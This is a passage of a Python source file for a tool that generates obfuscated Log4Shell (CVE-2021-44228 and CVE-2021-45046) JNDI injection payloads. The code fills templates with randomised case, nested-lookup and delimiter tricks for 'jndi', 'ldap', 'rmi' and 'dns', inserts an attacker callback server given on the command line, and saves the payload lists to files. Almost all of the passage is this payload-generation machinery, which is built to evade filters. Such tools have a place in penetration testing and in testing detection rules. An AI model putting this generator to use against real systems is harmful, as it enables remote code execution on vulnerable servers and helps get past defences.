mapping_of_placeholders_to_secondary_obfuscated_characters 144 | else: 145 | mapping = mapping_of_placeholders_to_primary_obfuscated_characters 146 | 147 | for i in selected_template: 148 | count = 0 149 | for key in mapping: 150 | if count == 0: 151 | new_payload = i.replace(key, random.choice(mapping[key])) 152 | else: 153 | new_payload = new_payload.replace(key, random.choice(mapping[key])) 154 | count = count + 1 155 | new_payload = replace_callback_host(new_payload) 156 | new_payload = replace_random(new_payload) 157 | obfuscated_payloads.append(new_payload) 158 | 159 | return obfuscated_payloads 160 | 161 | 162 | def save_payloads(filepath, obfuscated_payloads): 163 | """ 164 | log generated payloads to text files. 165 | :param filepath: string 166 | :param obfuscated_payloads: list 167 | """ 168 | with open(filepath, 'w') as f: 169 | for payload in obfuscated_payloads: 170 | f.write("%s\n" % payload) 171 | cprint(f"[INFO] Generated payloads logged to text files under '{filepath}'", "cyan") 172 | 173 | 174 | def replace_callback_host(payload): 175 | """ 176 | Replace the {{callback_host}} placeholder in the payload with the malicious server specified by the "-s" option. 177 | :param payload: payload 178 | :return: string 179 | """ 180 | new_payload = payload 181 | if args.server: 182 | new_payload = payload.replace("{{callback_host}}", args.server) 183 | return new_payload 184 | 185 | 186 | def replace_random(payload): 187 | """ 188 | Replace the {{random}} placeholder in the payload with an 8-digit random string. 189 | :param payload: 190 | :return: 191 | """ 192 | string_val = "".join(random.choice(string.ascii_lowercase) for i in range(8)) 193 | new_payload = payload.replace("{{random}}", string_val) 194 | return new_payload 195 | 196 | 197 | if hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_44228_payloads") or\ 198 | hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_45046_payloads") or\ 199 | hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_44228_payloads") or\ 200 | hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_45046_payloads"): 201 | # payloads template 202 | cve_2021_44228_obfuscated_payloads_template = [] 203 | cve_2021_45046_obfuscated_payloads_template = [] 204 | 205 | if hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_44228_payloads") or\ 206 | hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_45046_payloads"): 207 | # primary obfuscated templates 208 | lower_case_primary_obfuscated_templates = [] 209 | upper_case_primary_obfuscated_templates = [] 210 | delimiter_primary_obfuscated_templates = [] 211 | 212 | lookups_primary_obfuscated = {} 213 | delimiter_primary_obfuscated = {} 214 | proto_primary_obfuscated = {} 215 | 216 | j_lookup_primary_obfuscated = [] 217 | n_lookup_primary_obfuscated = [] 218 | d_lookup_primary_obfuscated = [] 219 | i_lookup_primary_obfuscated = [] 220 | jndi_lookup_primary_obfuscated = { 221 | "j": j_lookup_primary_obfuscated, 222 | "n": n_lookup_primary_obfuscated, 223 | "d": d_lookup_primary_obfuscated, 224 | "i": i_lookup_primary_obfuscated, 225 | } 226 | lookups_primary_obfuscated.update({"jndi": jndi_lookup_primary_obfuscated}) 227 | 228 | colon_primary_obfuscated = [] 229 | colon_component_primary_obfuscated = { 230 | ":": colon_primary_obfuscated 231 | } 232 | delimiter_primary_obfuscated.update({"colon_component": colon_component_primary_obfuscated}) 233 | 234 | r_proto_primary_obfuscated = [] 235 | m_proto_primary_obfuscated = [] 236 | i_proto_primary_obfuscated = [] 237 | rmi_proto_primary_obfuscated = { 238 | "r": r_proto_primary_obfuscated, 239 | "m": m_proto_primary_obfuscated, 240 | "i": i_proto_primary_obfuscated 241 | } 242 | proto_primary_obfuscated.update({"rmi": rmi_proto_primary_obfuscated}) 243 | 244 | d_proto_primary_obfuscated = [] 245 | n_proto_primary_obfuscated = [] 246 | s_proto_primary_obfuscated = [] 247 | dns_proto_primary_obfuscated = { 248 | "d": d_proto_primary_obfuscated, 249 | "n": n_proto_primary_obfuscated, 250 | "s": s_proto_primary_obfuscated, 251 | } 252 | proto_primary_obfuscated.update({"dns": dns_proto_primary_obfuscated}) 253 | 254 | l_proto_primary_obfuscated = [] 255 | a_proto_primary_obfuscated = [] 256 | p_proto_primary_obfuscated = [] 257 | ldap_proto_primary_obfuscated = { 258 | "l": l_proto_primary_obfuscated, 259 | "a": a_proto_primary_obfuscated, 260 | "p": p_proto_primary_obfuscated 261 | } 262 | proto_primary_obfuscated.update({"ldap": ldap_proto_primary_obfuscated}) 263 | 264 | schema_primary = { 265 | "lookups": lookups_primary_obfuscated, 266 | "proto": proto_primary_obfuscated, 267 | "delimiter": delimiter_primary_obfuscated 268 | } 269 | 270 | mapping_of_placeholders_to_primary_obfuscated_characters = { 271 | "{{j_lookup}}": j_lookup_primary_obfuscated, 272 | "{{n_lookup}}": n_lookup_primary_obfuscated, 273 | "{{d_lookup}}": d_lookup_primary_obfuscated, 274 | "{{i_lookup}}": i_lookup_primary_obfuscated, 275 | "{{colon}}": colon_primary_obfuscated, 276 | "{{r_proto}}": r_proto_primary_obfuscated, 277 | "{{m_proto}}": m_proto_primary_obfuscated, 278 | "{{i_proto}}": i_proto_primary_obfuscated, 279 | "{{d_proto}}": d_proto_primary_obfuscated, 280 | "{{n_proto}}": n_proto_primary_obfuscated, 281 | "{{s_proto}}": s_proto_primary_obfuscated, 282 | "{{l_proto}}": l_proto_primary_obfuscated, 283 | "{{a_proto}}": a_proto_primary_obfuscated, 284 | "{{p_proto}}": p_proto_primary_obfuscated 285 | } 286 | 287 | if hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_44228_payloads") or\ 288 | hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_45046_payloads"): 289 | # secondary obfuscated templates 290 | lower_case_secondary_obfuscated_templates = [] 291 | upper_case_secondary_obfuscated_templates = [] 292 | delimiter_secondary_obfuscated_templates = [] 293 | 294 | lookups_secondary_obfuscated = {} 295 | delimiter_secondary_obfuscated = {} 296 | proto_secondary_obfuscated = {} 297 | 298 | j_lookup_secondary_obfuscated = [] 299 | n_lookup_secondary_obfuscated = [] 300 | d_lookup_secondary_obfuscated = [] 301 | i_lookup_secondary_obfuscated = [] 302 | jndi_lookup_secondary_obfuscated = { 303 | "j": j_lookup_secondary_obfuscated, 304 | "n": n_lookup_secondary_obfuscated, 305 | "d": d_lookup_secondary_obfuscated, 306 | "i": i_lookup_secondary_obfuscated, 307 | } 308 | lookups_secondary_obfuscated.update({"jndi": jndi_lookup_secondary_obfuscated}) 309 | 310 | colon_secondary_obfuscated = [] 311 | colon_component_secondary_obfuscated = { 312 | ":": colon_secondary_obfuscated 313 | } 314 | delimiter_secondary_obfuscated.update({"colon_component": colon_component_secondary_obfuscated}) 315 | 316 | r_proto_secondary_obfuscated = [] 317 | m_proto_secondary_obfuscated = [] 318 | i_proto_secondary_obfuscated = [] 319 | rmi_proto_secondary_obfuscated = { 320 | "r": r_proto_secondary_obfuscated, 321 | "m": m_proto_secondary_obfuscated, 322 | "i": i_proto_secondary_obfuscated 323 | } 324 | proto_secondary_obfuscated.update({"rmi": rmi_proto_secondary_obfuscated}) 325 | 326 | d_proto_secondary_obfuscated = [] 327 | n_proto_secondary_obfuscated = [] 328 | s_proto_secondary_obfuscated = [] 329 | dns_proto_secondary_obfuscated = { 330 | "d": d_proto_secondary_obfuscated, 331 | "n": n_proto_secondary_obfuscated, 332 | "s": s_proto_secondary_obfuscated, 333 | } 334 | proto_secondary_obfuscated.update({"dns": dns_proto_secondary_obfuscated}) 335 | 336 | l_proto_secondary_obfuscated = [] 337 | a_proto_secondary_obfuscated = [] 338 | p_proto_secondary_obfuscated = [] 339 | ldap_proto_secondary_obfuscated = { 340 | "l": l_proto_secondary_obfuscated, 341 | "a": a_proto_secondary_obfuscated, 342 | "p": p_proto_secondary_obfuscated 343 | } 344 | proto_secondary_obfuscated.update({"ldap": ldap_proto_secondary_obfuscated}) 345 | 346 | schema_secondary = { 347 | "lookups": lookups_secondary_obfuscated, 348 | "proto": proto_secondary_obfuscated, 349 | "delimiter": delimiter_secondary_obfuscated 350 | } 351 | 352 | mapping_of_placeholders_to_secondary_obfuscated_characters = { 353 | "{{j_lookup}}": j_lookup_secondary_obfuscated, 354 | "{{n_lookup}}": n_lookup_secondary_obfuscated, 355 | "{{d_lookup}}": d_lookup_secondary_obfuscated, 356 | "{{i_lookup}}": i_lookup_secondary_obfuscated, 357 | "{{colon}}": colon_secondary_obfuscated, 358 | "{{r_proto}}": r_proto_secondary_obfuscated, 359 | "{{m_proto}}": m_proto_secondary_obfuscated, 360 | "{{i_proto}}": i_proto_secondary_obfuscated, 361 | "{{d_proto}}": d_proto_secondary_obfuscated, 362 | "{{n_proto}}": n_proto_secondary_obfuscated, 363 | "{{s_proto}}": s_proto_secondary_obfuscated, 364 | "{{l_proto}}": l_proto_secondary_obfuscated, 365 | "{{a_proto}}": a_proto_secondary_obfuscated, 366 | "{{p_proto}}": p_proto_secondary_obfuscated 367 | } 368 | 369 | # Placeholder-to-character mapping for the prefix of the secondary obfuscation 370 | mapping_of_the_secondary_obfuscation_lookup_placeholder_to_character = { 371 | "{{e_lookup}}": "e", 372 | "{{r_lookup}}": "r", 373 | "{{s_lookup}}": "s", 374 | "{{n_lookup}}": "n", 375 | "{{p_lookup}}": "p", 376 | "{{o_lookup}}": "o", 377 | "{{k_lookup}}": "k", 378 | "{{m_lookup}}": "m", 379 | "{{a_lookup}}": "a", 380 | "{{l_lookup}}": "l", 381 | "{{w_lookup}}": "w", 382 | "{{v_lookup}}": "v", 383 | "{{c_lookup}}": "c", 384 | "{{t_lookup}}": "t", 385 | "{{i_lookup}}": "i", 386 | "{{d_lookup}}": "d", 387 | "{{g_lookup}}": "g", 388 | "{{4_lookup}}": "4", 389 | "{{8_lookup}}": "8", 390 | "{{x_lookup}}": "x", 391 | "{{y_lookup}}": "y", 392 | "{{b_lookup}}": "b", 393 | "{{j_lookup}}": "j", 394 | "{{u_lookup}}": "u" 395 | } 396 | 397 | 398 | def load_obfuscated_template(): 399 | """ 400 | Load primary obfuscated or secondary obfuscated template. 401 | """ 402 | if hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_44228_payloads") or\ 403 | hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_45046_payloads"): 404 | read_file_to_list("primary_obfuscated_template/delimiter_obfuscated.txt", delimiter_primary_obfuscated_templates) 405 | read_file_to_list("primary_obfuscated_template/lower_case_obfuscated.txt", lower_case_primary_obfuscated_templates) 406 | read_file_to_list("primary_obfuscated_template/upper_case_obfuscated.txt", upper_case_primary_obfuscated_templates) 407 | 408 | if hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_44228_payloads") or\ 409 | hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_45046_payloads"): 410 | read_file_to_list("secondary_obfuscated_template/delimiter_obfuscated.txt", delimiter_secondary_obfuscated_templates) 411 | read_file_to_list("secondary_obfuscated_template/lower_case_obfuscated.txt", lower_case_secondary_obfuscated_templates) 412 | read_file_to_list("secondary_obfuscated_template/upper_case_obfuscated.txt", upper_case_secondary_obfuscated_templates) 413 | 414 | 415 | def replace_templates_placeholders_with_schema_chars(is_secondary_obfuscated): 416 | """ 417 | Obfuscate char in schema. If the parameter is_secondary_obfuscated is True, the chars are obfuscated secondary. 418 | Otherwise, the chars are obfuscated primary. 419 | :param is_secondary_obfuscated: boolean 420 | """ 421 | if is_secondary_obfuscated: 422 | schema = schema_secondary 423 | lower_case_templates = lower_case_secondary_obfuscated_templates 424 | upper_case_templates = upper_case_secondary_obfuscated_templates 425 | delimiter_templates = delimiter_secondary_obfuscated_templates 426 | else: 427 | schema = schema_primary 428 | lower_case_templates = lower_case_primary_obfuscated_templates 429 | upper_case_templates = upper_case_primary_obfuscated_templates 430 | delimiter_templates = delimiter_primary_obfuscated_templates 431 | 432 | for part in schema: 433 | for prefix in schema[part]: 434 | for char in schema[part][prefix]: 435 | if part == "lookups": 436 | replace_placeholders_for_lookups_in_template_with_chars_and_append_replaced_lookups_to_list\ 437 | (is_secondary_obfuscated, lower_case_templates, part, prefix, char) 438 | replace_placeholders_for_lookups_in_template_with_chars_and_append_replaced_lookups_to_list\ 439 | (is_secondary_obfuscated, upper_case_templates, part, prefix, char) 440 | if part == "proto": 441 | replace_placeholders_for_lookups_in_template_with_chars_and_append_replaced_lookups_to_list\ 442 | (is_secondary_obfuscated, lower_case_templates, part, prefix, char) 443 | if part == "delimiter": 444 | replace_placeholders_for_lookups_in_template_with_chars_and_append_replaced_lookups_to_list\ 445 | (is_secondary_obfuscated, delimiter_templates, part, prefix, char) 446 | 447 | 448 | def replace_placeholders_for_lookups_in_template_with_chars_and_append_replaced_lookups_to_list\ 449 | (is_secondary_obfuscated, templates, part, prefix, char): 450 | """ 451 | writing obfuscated char into the schema. 452 | :param is_secondary_obfuscated: boolean 453 | :param templates: lowercase, uppercase or delimiter template. 454 | :param part: lookups, proto, delimiter 455 | :param prefix: jndi, rmi/dns/ldap, colon_component 456 | :param char: j/n/d/i, r/m/i/d/n/s/l/a/p, : 457 | """ 458 | if is_secondary_obfuscated: 459 | schema = schema_secondary 460 | else: 461 | schema = schema_primary 462 | for lookup_template in templates: 463 | lookup = substitute_lowercase_uppercase_lookup_variable_main_argument_key(lookup_template, char) 464 | if is_secondary_obfuscated: 465 | for key in mapping_of_the_secondary_obfuscation_lookup_placeholder_to_character: 466 | lookup = lookup.replace\ 467 | (key, get_lookup_prefix_char_secondary_obfuscated(mapping_of_the_secondary_obfuscation_lookup_placeholder_to_character[key])) 468 | schema[part][prefix][char].append(lookup) 469 | 470 | 471 | def get_lookup_prefix_char_secondary_obfuscated(char): 472 | """ 473 | Replace placeholders for selected unprefixed templates. 474 | :param char: char 475 | :return: string 476 | """ 477 | lookup_prefix_char_secondary_obfuscated_templates = [] 478 | read_file_to_list("secondary_obfuscated_template/lookup_prefix_char_obfuscated.txt", 479 | lookup_prefix_char_secondary_obfuscated_templates) 480 | selected_template = random.choice(lookup_prefix_char_secondary_obfuscated_templates) 481 | return substitute_lowercase_uppercase_lookup_variable_main_argument_key(selected_template, char) 482 | 483 | 484 | def substitute_lowercase_uppercase_lookup_variable_main_argument_key(lookup_template, char): 485 | """ 486 | Replace placeholders in obfuscated templates. 487 | :param lookup_template: lookup in obfuscated templates 488 | :param char: char 489 | :return: string 490 | """ 491 | lookup = lookup_template.replace("{{lowercase}}", char.lower()) 492 | lookup = lookup.replace("{{uppercase}}", char.upper()) 493 | lookup = lookup.replace("{{random_lookup}}", get_random_string(get_string_length())) 494 | lookup = lookup.replace("{{random_variable}}", get_random_string(get_string_length())) 495 | lookup = lookup.replace("{{main_argument_key}}", get_main_argument_key()) 496 | return lookup 497 | 498 | 499 | def get_main_argument_key(): 500 | """ 501 | Get Main Arguments Lookup invalid key in index form. 502 | :description: According to the definition in the Log4j 2 Lookups manual, the key after the "main:" prefix of the 503 | Main Arguments Lookup can be either a 0-based index in the argument list, or a string. This method will generate 504 | a key in invalid index form, causing the Main Arguments Lookup to fail and the default value to be used instead. 505 | :return: string 506 | """ 507 | return str(random.randint(100, 9999)) 508 | 509 | 510 | def get_string_length(): 511 | """ 512 | Get the length of the string at random, in the range 4 to 22, as this is the length of most Lookups and variable names. 513 | :return: int 514 | """ 515 | return random.randint(4, 22) 516 | 517 | 518 | def get_random_string(length): 519 | """ 520 | Generates a random string of specified length, including upper and lowercase letters, numbers, and ".". 521 | This method will be used to generate non-existing lookups and random variable names. 522 | :param length: length of the string 523 | :return: string 524 | """ 525 | letters = string.ascii_letters 526 | digits = string.digits 527 | dot = '.' 528 | char_set = letters+digits+dot 529 | result_str = ''.join(random.choice(list(char_set)) for i in range(length)) 530 | return result_str 531 | 532 | 533 | def read_file_to_list(src_file, dst_list): 534 | """ 535 | Read file contents into a list. 536 | :param src_file: Source File 537 | :param dst_list: destination list 538 | """ 539 | with open(src_file, 'r') as f: 540 | for item in f.readlines(): 541 | item = item.strip() 542 | if item == "" or item.startswith("#"): 543 | continue 544 | dst_list.append(item) 545 | 546 | 547 | def main(): 548 | print_banner() 549 | print_help_msg() 550 | if hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_44228_payloads") or \ 551 | hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_45046_payloads") or \ 552 | hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_44228_payloads") or \ 553 | hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_45046_payloads"): 554 | load_obfuscated_template() 555 | load_payloads_template() 556 | if hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_44228_payloads") or\ 557 | hasattr(args, "number_of_generated_primary_obfuscated_cve_2021_45046_payloads"): 558 | replace_templates_placeholders_with_schema_chars(False) 559 | if hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_44228_payloads") or \ 560 | hasattr(args, "number_of_generated_secondary_obfuscated_cve_2021_45046_payloads"): 561 | replace_templates_placeholders_with_schema_chars(True) 562 | for option in vars(args).keys(): 563 | is_secondary_obfuscated = False 564 | if option == "number_of_generated_secondary_obfuscated_cve_2021_44228_payloads" or\ 565 | option == "number_of_generated_secondary_obfuscated_cve_2021_45046_payloads": 566 | is_secondary_obfuscated = True 567 | info = get_filepath_template_num(option) 568 | if info[0] is not None: 569 | filepath = info[0] 570 | templates = info[1] 571 | num = info[2] 572 | obfuscated_payloads = generate_obfuscated_payloads(templates, num, is_secondary_obfuscated) 573 | save_payloads(filepath, obfuscated_payloads) 574 | 575 | 576 | if __name__ == '__main__': 577 | main() --------------------------------------------------------------------------------